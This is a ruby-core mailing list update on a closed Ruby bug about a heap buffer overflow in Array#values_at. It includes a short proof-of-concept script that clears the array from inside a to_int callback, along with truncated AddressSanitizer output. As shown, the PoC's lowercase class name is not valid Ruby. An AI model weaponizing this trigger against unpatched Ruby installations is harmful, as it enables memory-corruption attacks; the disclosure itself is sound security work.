From: "k0kubun (Takashi Kokubun) via ruby-core" Date: 2026-10-09T23:07:27+00:00 Subject: [ruby-core:127055] [Ruby Bug#22326] heap buffer overflow in array.values_at() Issue #22326 has been updated by k0kubun (Takashi Kokubun). Backport changed from 3.3: WONTFIX, 3.4: REQUIRED, 4.0: REQUIRED to 3.3: WONTFIX, 3.4: REQUIRED, 4.0: DONE ruby_4_0 commit:738b4971c635246ad33c87263ddef5bb160ab255. ---------------------------------------- Bug #22326: heap buffer overflow in array.values_at() https://bugs.ruby-lang.org/issues/22326#change-119452 * Author: danielchong (Daniel Chong) * Status: Closed * ruby -v: 4.1.0dev * Backport: 3.3: WONTFIX, 3.4: REQUIRED, 4.0: DONE ---------------------------------------- Hello, I discovered a heap buffer overflow in array.values_at(). I believe the root issue/potential fix is similar to #22325, but the code paths are distinct. PoC: ``` class bad < Numeric def initialize(v); @v = v; end def val; @v; end def <=>(o); @v <=> (o.is_a?(bad) ? o.val : o); end def to_int; $a.clear; @v; end def to_i; @v; end def coerce(o); [o, @v]; end end $a = (1..3000).to_a $a.values_at(Range.new(bad.new(2900), bad.new(2950))) ``` asan output (truncated): ``` ERROR: AddressSanitizer: heap-buffer-overflow ... READ of size 408 ... #3 ary_memcpy0 array.c:354 #4 rb_ary_cat array.c:1417 #5 append_values_at_single array.c:3970 #6 rb_ary_values_at array.c:4096 ``` -- https://bugs.ruby-lang.org/ ______________________________________________ ruby-core mailing list -- ruby-core@ml.ruby-lang.org To unsubscribe send an email to ruby-core-leave@ml.ruby-lang.org ruby-core info -- https://ml.ruby-lang.org/mailman3/lists/ruby-core.ml.ruby-lang.org/